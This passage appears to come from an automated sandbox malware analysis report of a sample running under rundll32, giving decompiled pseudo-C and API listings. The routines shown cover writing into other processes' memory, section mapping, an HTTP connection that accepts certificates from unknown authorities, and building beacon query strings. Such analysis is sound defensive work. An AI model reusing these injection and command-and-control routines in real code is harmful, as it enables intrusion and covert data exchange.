                                                          • API String ID: 722216270-0
                                                          • Opcode ID: a2aae58e40181b82c1bb384beaad6572158e03a4e74f2ff562ba7f26d2f41f93
                                                          • Instruction ID: 3ebee9477d586d42d6d61e2e8eb3c397d4e2899335ee05e28510b1b180ba70a1
                                                          • Opcode Fuzzy Hash: a2aae58e40181b82c1bb384beaad6572158e03a4e74f2ff562ba7f26d2f41f93
                                                          • Instruction Fuzzy Hash: 8FF0F471520309FFEB05DB94D94AFED7BBCEB44355F104049B501E6080EBB89B08E764
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • NtWriteVirtualMemory.NTDLL(00000318,00000000,00000000,?,055856C2,00000000,?,055856C2,?,00000000,00000000,00000318,00000020,?,00010003,?), ref: 055888AE (ProcessHandle 0x318 is an explicit handle, not the current-process pseudo-handle -1: a write into another process)
                                                          • RtlNtStatusToDosError.NTDLL(C0000002), ref: 055888BD
                                                          • SetLastError.KERNEL32(00000000,?,055856C2,?,00000000,00000000,00000318,00000020,?,00010003,?,?,00000318,00000008), ref: 055888C4
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Error$LastMemoryStatusVirtualWrite
                                                          • String ID:
                                                          • API String ID: 1089604434-0
                                                          • Opcode ID: 2bc3ac739df1ad78718f6bc9afe3c5af43b94833906e26c5a1b129943efab188
                                                          • Instruction ID: c0156a53b3f3ce1c8dc24f6e0643aa778a66f696741936d3836d9f47ceeef9c2
                                                          • Opcode Fuzzy Hash: 2bc3ac739df1ad78718f6bc9afe3c5af43b94833906e26c5a1b129943efab188
                                                          • Instruction Fuzzy Hash: 37E0483261421AABDF016FD49C05DAB7F59FB48751F454C11FE01D6121DB35C425ABE0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 21%
                                                          			// Builds an HTTP request context in the struct at __esi (+0x10 session handle, +0x14 connection handle, +0x18 request handle).
                                                          			// The __imp__ calls are unresolved in the dump; the port 0x50, the option numbers 0x1f/6/5/3 and the flag values match the WinINet
                                                          			// sequence InternetOpen / InternetConnect / HttpOpenRequest / InternetQueryOption / InternetSetOption (editor's inference from those
                                                          			// values, not resolved import names).
                                                          			E00E55A5D(void* __ecx, intOrPtr* __esi, void* __eflags, signed int _a4, char _a8) {
                                                          				intOrPtr _v8;
                                                          				char _v12;
                                                          				signed int _t37;
                                                          				long _t39;
                                                          				long _t40;
                                                          				signed int _t41;
                                                          				intOrPtr _t42;
                                                          				signed int _t43;
                                                          				intOrPtr _t44;
                                                          				intOrPtr _t45;
                                                          				intOrPtr _t46;
                                                          				intOrPtr _t48;
                                                          				void* _t65;
                                                          				intOrPtr* _t67;
                                                          				intOrPtr* _t68;
                                                          				void* _t71;
                                                          
                                                          				_t68 = __esi;
                                                          				_t65 = E00E53FC1(_t37, _a4); // E00E53FC1 / E00E513CC: prepare and release a string buffer (helper pair; bodies not in this excerpt)
                                                          				if(_t65 == 0) {
                                                          					L18:
                                                          					_t39 = GetLastError(); // shared failure path: return the last Win32 error
                                                          				} else {
                                                          					_t40 = GetVersion();
                                                          					_t71 = _t40 - 6;
                                                          					if(_t71 > 0 || _t71 == 0 && _t40 > 2) { // version test (the decompiler has folded the major/minor byte compares into one integer compare): 4 on newer Windows, 0 on older, matching INTERNET_OPEN_TYPE_PRECONFIG_WITH_NO_AUTOPROXY vs INTERNET_OPEN_TYPE_PRECONFIG if this is WinINet
                                                          						_a4 = 4;
                                                          					} else {
                                                          						_a4 = 0;
                                                          					}
                                                          					__imp__(_t65, _a4, 0, 0, 0); // executed; (agent string, access type, 0, 0, 0) is the InternetOpen argument shape
                                                          					 *(_t68 + 0x10) = _t40; // session handle
                                                          					_t41 = E00E513CC(_t65);
                                                          					if( *(_t68 + 0x10) == 0) {
                                                          						goto L18;
                                                          					} else {
                                                          						_t42 = E00E53FC1(_t41,  *_t68); // host name taken from the first field of the context
                                                          						_v8 = _t42;
                                                          						if(_t42 == 0) {
                                                          							goto L18;
                                                          						} else {
                                                          							_t67 = __imp__; // 0x7042f5a0: called below as (handle, option, &value, size), the InternetSetOption shape
                                                          							if(_a8 == 0) {
                                                          								L10:
                                                          								__imp__( *(_t68 + 0x10), _v8, 0x50, 0); // (session, host, port 0x50 = 80, ...) is the InternetConnect argument shape
                                                          								 *((intOrPtr*)(_t68 + 0x14)) = _t42; // connection handle
                                                          								_t43 = E00E513CC(_v8);
                                                          								if( *((intOrPtr*)(_t68 + 0x14)) == 0) {
                                                          									goto L18;
                                                          								} else {
                                                          									_a4 = 0x100; // request flags; 0x100 = INTERNET_FLAG_PRAGMA_NOCACHE if WinINet
                                                          									_t44 = E00E53FC1(_t43,  *((intOrPtr*)(_t68 + 4))); // object name (URL path) from the second field of the context
                                                          									_v8 = _t44;
                                                          									if(_t44 == 0) {
                                                          										goto L18;
                                                          									} else {
                                                          										_t45 =  *0xe5a2d4; // 0x435d5a8: the same run-time delta used in the process-enumeration routine
                                                          										_t21 = _t45 + 0xe5b76c; // 0x450047: little-endian bytes 47 00 45 00 = L"GE", the start of a UTF-16 HTTP verb string
                                                          										_t46 = _t21;
                                                          										__imp__( *((intOrPtr*)(_t68 + 0x14)), _t46, _v8, 0, 0, 0, _a4); // executed; (connection, verb, object name, version 0, referrer 0, accept types 0, flags) is the HttpOpenRequestW shape
                                                          										 *((intOrPtr*)(_t68 + 0x18)) = _t46; // request handle
                                                          										E00E513CC(_v8);
                                                          										_t48 =  *((intOrPtr*)(_t68 + 0x18));
                                                          										if(_t48 == 0) {
                                                          											goto L18;
                                                          										} else {
                                                          											_v12 = 4;
                                                          											__imp__(_t48, 0x1f,  &_a4,  &_v12); // query option 0x1f = INTERNET_OPTION_SECURITY_FLAGS (4-byte value) on the request handle
                                                          											if(_t48 != 0) {
                                                          												_a4 = _a4 | 0x00000100; // 0x100 = SECURITY_FLAG_IGNORE_UNKNOWN_CA: certificates from an unknown CA are accepted
                                                          												 *_t67( *((intOrPtr*)(_t68 + 0x18)), 0x1f,  &_a4, 4); // write the modified flags back
                                                          											}
                                                          											_push(4);
                                                          											_push( &_a8);
                                                          											_push(6); // option 6 = INTERNET_OPTION_RECEIVE_TIMEOUT, value _a8
                                                          											_push( *((intOrPtr*)(_t68 + 0x18)));
                                                          											if( *_t67() == 0) {
                                                          												goto L18;
                                                          											} else {
                                                          												_push(4);
                                                          												_push( &_a8);
                                                          												_push(5); // option 5 = INTERNET_OPTION_SEND_TIMEOUT, same value
                                                          												_push( *((intOrPtr*)(_t68 + 0x18)));
                                                          												if( *_t67() == 0) {
                                                          													goto L18;
                                                          												} else {
                                                          													_t39 = 0; // success
                                                          												}
                                                          											}
                                                          										}
                                                          									}
                                                          								}
                                                          							} else {
                                                          								_t42 =  *_t67( *(_t68 + 0x10), 3,  &_a8, 4); // _a8 != 0: option 3 (INTERNET_OPTION_CONNECT_RETRIES in WinINet numbering) is set on the session handle before connecting
                                                          								if(_t42 == 0) {
                                                          									goto L18;
                                                          								} else {
                                                          									goto L10;
                                                          								}
                                                          							}
                                                          						}
                                                          					}
                                                          				}
                                                          				return _t39; // 0 on success, otherwise the GetLastError() value from L18
                                                          			}

                                                          APIs
                                                            • Part of subcall function 00E53FC1: lstrlen.KERNEL32(?,00000000,051B9CD0,74ECC740,00E535B6,051B9ED5,?,KE,?,KE,?,69B25F44,E8FA7DD7,00000000), ref: 00E53FC8
                                                            • Part of subcall function 00E53FC1: mbstowcs.NTDLL ref: 00E53FF1
                                                            • Part of subcall function 00E53FC1: memset.NTDLL ref: 00E54003
                                                          • GetVersion.KERNEL32(00000000,0000EA60,00000008,?,?,?,00E5135B,751881D0,00000000,051B9698,?,?,00E530D3,?,051B9698,0000EA60), ref: 00E55A78
                                                          • GetLastError.KERNEL32(00000000,0000EA60,00000008,?,?,?,00E5135B,751881D0,00000000,051B9698,?,?,00E530D3,?,051B9698,0000EA60), ref: 00E55BA8
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: ErrorLastVersionlstrlenmbstowcsmemset
                                                          • String ID:
                                                          • API String ID: 4097109750-0
                                                          • Opcode ID: e6fd3575af9b976447934c647f064a6597fb26a53f8d8c4becbcf1fdae6a31fe
                                                          • Instruction ID: cbe67af6f9bda08fdc17cba7ab5b65743a881badc3493074717e446daf542575
                                                          • Opcode Fuzzy Hash: e6fd3575af9b976447934c647f064a6597fb26a53f8d8c4becbcf1fdae6a31fe
                                                          • Instruction Fuzzy Hash: 2541AF72500709FFDF209FA1CC99EAA7BB8EF04346F005D29BA01A64A1D730DA48DB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 72%
                                                          			E00E56EB3(intOrPtr* __eax, void** _a4) {
                                                          				int _v12;
                                                          				void* _v16;
                                                          				void* _v20;
                                                          				void* _v24;
                                                          				int _v28;
                                                          				int _v32;
                                                          				intOrPtr _v36;
                                                          				int _v40;
                                                          				int _v44;
                                                          				void* _v48;
                                                          				void* __esi;
                                                          				long _t34;
                                                          				void* _t39;
                                                          				void* _t47;
                                                          				intOrPtr* _t48;
                                                          
                                                          				_t48 = __eax;
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				_v24 =  *((intOrPtr*)(__eax + 4));
                                                          				_v16 = 0;
                                                          				_v12 = 0;
                                                          				_v48 = 0x18;
                                                          				_v44 = 0;
                                                          				_v36 = 0x40;
                                                          				_v40 = 0;
                                                          				_v32 = 0;
                                                          				_v28 = 0;
                                                          				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
                                                          				if(_t34 < 0) {
                                                          					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
                                                          				} else {
                                                          					 *_t48 = _v16;
                                                          					_t39 = E00E57666(_t48,  &_v12); // executed
                                                          					_t47 = _t39;
                                                          					if(_t47 != 0) {
                                                          						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
                                                          					} else {
                                                          						memset(_v12, 0, _v24);
                                                          						 *_a4 = _v12;
                                                          					}
                                                          				}
                                                          				return _t47;
                                                          			}

                                                          APIs
                                                          • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,75144EE0,00000000,00000000,00E56B8B), ref: 00E56F10
                                                            • Part of subcall function 00E57666: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,00E56F25,00000002,00000000,?,?,00000000,?,?,00E56F25,00000000), ref: 00E57693
                                                          • memset.NTDLL ref: 00E56F32
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Section$CreateViewmemset
                                                          • String ID:
                                                          • API String ID: 2533685722-0
                                                          • Opcode ID: 6e31daf4e5f94dd54edd94774e635a10c951bc20b1e151571baaa93159135a00
                                                          • Instruction ID: b41705971b9a5a237de19fab8252afe1f013f61b2bad53d7e4583d6f953c2788
                                                          • Opcode Fuzzy Hash: 6e31daf4e5f94dd54edd94774e635a10c951bc20b1e151571baaa93159135a00
                                                          • Instruction Fuzzy Hash: B2212EB2E00209AFCB11DFA9C8849DEFBF9FF48355F508969E605F7210D7319A488B60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 05580E67
                                                          • NtWow64ReadVirtualMemory64.NTDLL(00000100,?,?,00000028,00000000,00000000,00000100,00000000,?,?,?,0559081D,00000000,00000000,00000028,00000100), ref: 05580E89
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: AddressMemory64ProcReadVirtualWow64
                                                          • String ID:
                                                          • API String ID: 752694512-0
                                                          • Opcode ID: a3beb8b7b7b12267c3301bd4060320a9202a0eb7cbcce9a4cee42dd7d84c00e1
                                                          • Instruction ID: 79833ff4a6eb78c0569db0f685b243a04e17beca261426e330329a0967b8a4cf
                                                          • Opcode Fuzzy Hash: a3beb8b7b7b12267c3301bd4060320a9202a0eb7cbcce9a4cee42dd7d84c00e1
                                                          • Instruction Fuzzy Hash: F3F04972510109BF8F01CF99DC05C6ABFBAFB84240B15401AF500D2230DB35E959EB20
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • NtMapViewOfSection.NTDLL(00000000,000000FF,0558B8EC,00000000,00000000,0558B8EC,00000000,00000002,00000000,?,?,00000000,0558B8EC,000000FF,00000000), ref: 0558A925
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: SectionView
                                                          • String ID:
                                                          • API String ID: 1323581903-0
                                                          • Opcode ID: 2cd136b18fd47c29f94374b8f148c9a9c123cd50275110905b50dafc155aad11
                                                          • Instruction ID: fff1f3f4f2fd0630e431f6aa3323fec9ddf39d7adc49ff47d9df6cce22bb4f72
                                                          • Opcode Fuzzy Hash: 2cd136b18fd47c29f94374b8f148c9a9c123cd50275110905b50dafc155aad11
                                                          • Instruction Fuzzy Hash: 5AF012B690420CFFDB119FA5CC85CAFBBBDEB44254B00886AF552E1050D2319E189B60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 68%
                                                          			E00E57666(void** __esi, PVOID* _a4) {
                                                          				long _v8;
                                                          				void* _v12;
                                                          				void* _v16;
                                                          				long _t13;
                                                          
                                                          				_v16 = 0;
                                                          				asm("stosd");
                                                          				_v8 = 0;
                                                          				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
                                                          				if(_t13 < 0) {
                                                          					_push(_t13);
                                                          					return __esi[6]();
                                                          				}
                                                          				return 0;
                                                          			}

                                                          APIs
                                                          • NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,00E56F25,00000002,00000000,?,?,00000000,?,?,00E56F25,00000000), ref: 00E57693
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: SectionView
                                                          • String ID:
                                                          • API String ID: 1323581903-0
                                                          • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                                          • Instruction ID: 57572a5f378c5d7af3ff4cb436cf3f3af0be053dc025656ae6de52e679b4f7cb
                                                          • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                                          • Instruction Fuzzy Hash: 1BF082B690420CFFDB119FA5CC84C9FBBBCEB44354B104D39B552E1090D6709E188A60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • NtQueryInformationProcess.NTDLL(00000000,?,00000018,00000000,0559C300), ref: 0558F80C
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: InformationProcessQuery
                                                          • String ID:
                                                          • API String ID: 1778838933-0
                                                          • Opcode ID: 0e9578b05d7783be484768b48a6886ac7c254b4740901699dce0f0497ec3732a
                                                          • Instruction ID: 012964a725f80043334dccc0db73fcf2c53050ef4b688900cb14d442ea999378
                                                          • Opcode Fuzzy Hash: 0e9578b05d7783be484768b48a6886ac7c254b4740901699dce0f0497ec3732a
                                                          • Instruction Fuzzy Hash: 5BF03431B001259BCB20EF59CC85DAABBA9FF09758B418115E901EB260D730E98BCBE0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          C-Code - Quality: 70%
                                                          			E00E548C2(long __eax, void* __edx, intOrPtr _a8, intOrPtr _a12, void* _a20, intOrPtr _a28) {
                                                          				intOrPtr _v4;
                                                          				intOrPtr _v8;
                                                          				intOrPtr _v12;
                                                          				intOrPtr _v16;
                                                          				void* _v24;
                                                          				intOrPtr _v40;
                                                          				void* __ecx;
                                                          				void* __edi;
                                                          				intOrPtr _t31;
                                                          				intOrPtr _t32;
                                                          				intOrPtr _t33;
                                                          				intOrPtr _t34;
                                                          				intOrPtr _t35;
                                                          				void* _t38;
                                                          				intOrPtr _t39;
                                                          				int _t42;
                                                          				void* _t43;
                                                          				intOrPtr _t44;
                                                          				intOrPtr _t48;
                                                          				intOrPtr _t52;
                                                          				intOrPtr _t55;
                                                          				intOrPtr _t56;
                                                          				intOrPtr _t62;
                                                          				intOrPtr _t66;
                                                          				intOrPtr* _t68;
                                                          				void* _t69;
                                                          				intOrPtr _t78;
                                                          				intOrPtr _t81;
                                                          				intOrPtr _t84;
                                                          				int _t87;
                                                          				intOrPtr _t88;
                                                          				int _t91;
                                                          				intOrPtr _t92;
                                                          				int _t95;
                                                          				void* _t98;
                                                          				void* _t99;
                                                          				void* _t103;
                                                          				intOrPtr _t105;
                                                          				long _t107;
                                                          				intOrPtr _t108;
                                                          				intOrPtr* _t109;
                                                          				long _t110;
                                                          				int _t111;
                                                          				void* _t112;
                                                          				void* _t113;
                                                          				void* _t114;
                                                          				void* _t115;
                                                          				void* _t117;
                                                          				void* _t118;
                                                          				void* _t120;
                                                          				void* _t121;
                                                          
                                                          				_t103 = __edx;
                                                          				_t110 = __eax;
                                                          				_v8 = 8;
                                                          				_t117 = RtlAllocateHeap( *0xe5a290, 0, 0x800);
                                                          				if(_t117 != 0) {
                                                          					if(_t110 == 0) {
                                                          						_t110 = GetTickCount();
                                                          					}
                                                          					_t31 =  *0xe5a018; // 0x94cfb54a
                                                          					asm("bswap eax");
                                                          					_t32 =  *0xe5a014; // 0x5cb11ae7
                                                          					asm("bswap eax");
                                                          					_t33 =  *0xe5a010; // 0x15dc9586
                                                          					asm("bswap eax");
                                                          					_t34 =  *0xe5a00c; // 0x69ab8210
                                                          					asm("bswap eax");
                                                          					_t35 =  *0xe5a2d4; // 0x435d5a8
                                                          					_t2 = _t35 + 0xe5b622; // 0x74666f73
                                                          					_t111 = wsprintfA(_t117, _t2, 2, 0x3d163, _t34, _t33, _t32, _t31,  *0xe5a02c,  *0xe5a004, _t110);
                                                          					_t38 = E00E56A9F();
                                                          					_t39 =  *0xe5a2d4; // 0x435d5a8
                                                          					_t3 = _t39 + 0xe5b662; // 0x74707526
                                                          					_t42 = wsprintfA(_t111 + _t117, _t3, _t38);
                                                          					_t120 = _t118 + 0x38;
                                                          					_t112 = _t111 + _t42;
                                                          					if(_a12 != 0) {
                                                          						_t92 =  *0xe5a2d4; // 0x435d5a8
                                                          						_t7 = _t92 + 0xe5b66d; // 0x732526
                                                          						_t95 = wsprintfA(_t112 + _t117, _t7, _a12);
                                                          						_t120 = _t120 + 0xc;
                                                          						_t112 = _t112 + _t95;
                                                          					}
                                                          					_t43 = E00E52C60(_t99);
                                                          					_t44 =  *0xe5a2d4; // 0x435d5a8
                                                          					_t9 = _t44 + 0xe5b38a; // 0x6d697426
                                                          					_t113 = _t112 + wsprintfA(_t112 + _t117, _t9, _t43, _t103);
                                                          					_t48 =  *0xe5a2d4; // 0x435d5a8
                                                          					_t11 = _t48 + 0xe5b33b; // 0x74636126
                                                          					_t114 = _t113 + wsprintfA(_t113 + _t117, _t11, 0);
                                                          					_t52 =  *0xe5a32c; // 0x51b95b0
                                                          					_t121 = _t120 + 0x1c;
                                                          					if(_t52 != 0) {
                                                          						_t88 =  *0xe5a2d4; // 0x435d5a8
                                                          						_t13 = _t88 + 0xe5b685; // 0x73797326
                                                          						_t91 = wsprintfA(_t114 + _t117, _t13, _t52);
                                                          						_t121 = _t121 + 0xc;
                                                          						_t114 = _t114 + _t91;
                                                          					}
                                                          					_t105 =  *0xe5a37c; // 0x51b9630
                                                          					_a28 = E00E53A66(0xe5a00a, _t105 + 4);
                                                          					_t55 =  *0xe5a31c; // 0x51b95e0
                                                          					_t107 = 0;
                                                          					if(_t55 != 0) {
                                                          						_t84 =  *0xe5a2d4; // 0x435d5a8
                                                          						_t16 = _t84 + 0xe5b8e9; // 0x3d736f26
                                                          						_t87 = wsprintfA(_t114 + _t117, _t16, _t55);
                                                          						_t121 = _t121 + 0xc;
                                                          						_t114 = _t114 + _t87;
                                                          					}
                                                          					_t56 =  *0xe5a318; // 0x0
                                                          					if(_t56 != _t107) {
                                                          						_t81 =  *0xe5a2d4; // 0x435d5a8
                                                          						_t18 = _t81 + 0xe5b8e2; // 0x3d706926
                                                          						wsprintfA(_t114 + _t117, _t18, _t56);
                                                          					}
                                                          					if(_a28 != _t107) {
                                                          						_t98 = RtlAllocateHeap( *0xe5a290, _t107, 0x800);
                                                          						if(_t98 != _t107) {
                                                          							E00E52C46(GetTickCount());
                                                          							_t62 =  *0xe5a37c; // 0x51b9630
                                                          							__imp__(_t62 + 0x40);
                                                          							asm("lock xadd [eax], ecx");
                                                          							_t66 =  *0xe5a37c; // 0x51b9630
                                                          							__imp__(_t66 + 0x40);
                                                          							_t68 =  *0xe5a37c; // 0x51b9630
                                                          							_t69 = E00E57156(1, _t103, _t117,  *_t68); // executed
                                                          							_t115 = _t69;
                                                          							asm("lock xadd [eax], ecx");
                                                          							if(_t115 != _t107) {
                                                          								StrTrimA(_t115, 0xe592ac);
                                                          								_push(_t115);
                                                          								_t108 = E00E55C8D();
                                                          								_v4 = _t108;
                                                          								if(_t108 != 0) {
                                                          									 *_t115 = 0;
                                                          									__imp__(_t98, _a8);
                                                          									_t109 = __imp__;
                                                          									 *_t109(_t98, _t108);
                                                          									 *_t109(_t98, _t115);
                                                          									_t78 = E00E53097(0xffffffffffffffff, _t98, _v12, _v8); // executed
                                                          									_v40 = _t78;
                                                          									if(_t78 != 0 && _t78 != 0x10d2) {
                                                          										E00E53546();
                                                          									}
                                                          									HeapFree( *0xe5a290, 0, _v24);
                                                          								}
                                                          								HeapFree( *0xe5a290, 0, _t115);
                                                          								_t107 = 0;
                                                          							}
                                                          							HeapFree( *0xe5a290, _t107, _t98);
                                                          						}
                                                          						HeapFree( *0xe5a290, _t107, _a20);
                                                          					}
                                                          					RtlFreeHeap( *0xe5a290, _t107, _t117); // executed
                                                          				}
                                                          				return _v16;
                                                          			}

                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(00000000,00000800,?), ref: 00E548E0
                                                          • GetTickCount.KERNEL32 ref: 00E548F4
                                                          • wsprintfA.USER32 ref: 00E54943
                                                          • wsprintfA.USER32 ref: 00E54960
                                                          • wsprintfA.USER32 ref: 00E54981
                                                          • wsprintfA.USER32 ref: 00E5499F
                                                          • wsprintfA.USER32 ref: 00E549B4
                                                          • wsprintfA.USER32 ref: 00E549D5
                                                          • wsprintfA.USER32 ref: 00E54A0F
                                                          • wsprintfA.USER32 ref: 00E54A2F
                                                          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00E54A4A
                                                          • GetTickCount.KERNEL32 ref: 00E54A5A
                                                          • RtlEnterCriticalSection.NTDLL(051B95F0), ref: 00E54A6E
                                                          • RtlLeaveCriticalSection.NTDLL(051B95F0), ref: 00E54A8C
                                                            • Part of subcall function 00E57156: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,00000000,00E54A9F,00000000,051B9630), ref: 00E57181
                                                            • Part of subcall function 00E57156: lstrlen.KERNEL32(00000000,?,00000000,00E54A9F,00000000,051B9630), ref: 00E57189
                                                            • Part of subcall function 00E57156: strcpy.NTDLL ref: 00E571A0
                                                            • Part of subcall function 00E57156: lstrcat.KERNEL32(00000000,00000000), ref: 00E571AB
                                                            • Part of subcall function 00E57156: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,00E54A9F,?,00000000,00E54A9F,00000000,051B9630), ref: 00E571C8
                                                          • StrTrimA.SHLWAPI(00000000,00E592AC,00000000,051B9630), ref: 00E54ABA
                                                            • Part of subcall function 00E55C8D: lstrlen.KERNEL32(051B887A,00000000,00000000,00000000,00E54AC6,00000000), ref: 00E55C9D
                                                            • Part of subcall function 00E55C8D: lstrlen.KERNEL32(?), ref: 00E55CA5
                                                            • Part of subcall function 00E55C8D: lstrcpy.KERNEL32(00000000,051B887A), ref: 00E55CB9
                                                            • Part of subcall function 00E55C8D: lstrcat.KERNEL32(00000000,?), ref: 00E55CC4
                                                          • lstrcpy.KERNEL32(00000000,?), ref: 00E54AD8
                                                          • lstrcat.KERNEL32(00000000,00000000), ref: 00E54AE6
                                                          • lstrcat.KERNEL32(00000000,00000000), ref: 00E54AEA
                                                          • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 00E54B1A
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00E54B29
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000,051B9630), ref: 00E54B39
                                                          • HeapFree.KERNEL32(00000000,?), ref: 00E54B4A
                                                          • RtlFreeHeap.NTDLL(00000000,00000000), ref: 00E54B58
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: wsprintf$Heap$Free$lstrcatlstrlen$AllocateCountCriticalSectionTickTrimlstrcpy$EnterLeavestrcpy
                                                          • String ID:
                                                          • API String ID: 1837416118-0
                                                          • Opcode ID: f421fc413b21a3697f4393c07f72dbaba7c24ed3bb67548f2c4ad9984be17142
                                                          • Instruction ID: 500be12196eadf1d77ec481482321f91350b21d2fd6d16a6c36fc97c46be3b30
                                                          • Opcode Fuzzy Hash: f421fc413b21a3697f4393c07f72dbaba7c24ed3bb67548f2c4ad9984be17142
                                                          • Instruction Fuzzy Hash: 6B718072500304AFC765DB66DC49E9A77ECEB48306F090D25F909F3271E635E90D9B62
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          C-Code - Quality: 83%
                                                          			E00E550A3(intOrPtr __edx, intOrPtr _a4, char _a8) {
                                                          				struct %anon52 _v8;
                                                          				long _v12;
                                                          				char _v16;
                                                          				char _v20;
                                                          				signed int _v24;
                                                          				intOrPtr _v32;
                                                          				union _LARGE_INTEGER _v36;
                                                          				intOrPtr _v40;
                                                          				void* _v44;
                                                          				void _v88;
                                                          				char _v92;
                                                          				struct %anon52 _t46;
                                                          				intOrPtr _t51;
                                                          				long _t53;
                                                          				void* _t54;
                                                          				struct %anon52 _t61;
                                                          				long _t65;
                                                          				signed int _t66;
                                                          				long _t68;
                                                          				void* _t69;
                                                          				void* _t71;
                                                          				signed int _t72;
                                                          				intOrPtr _t74;
                                                          				intOrPtr _t76;
                                                          				void** _t78;
                                                          				void* _t80;
                                                          
                                                          				_t74 = __edx;
                                                          				_v92 = 0;
                                                          				memset( &_v88, 0, 0x2c);
                                                          				_t46 = CreateWaitableTimerA(0, 1, 0);
                                                          				_v44 = _t46;
                                                          				if(_t46 == 0) {
                                                          					_v8.LowPart = GetLastError();
                                                          				} else {
                                                          					_push(0xffffffff);
                                                          					_push(0xff676980);
                                                          					_push(0);
                                                          					_push( *0xe5a298);
                                                          					_v20 = 0;
                                                          					_v16 = 0;
                                                          					L00E57DDC();
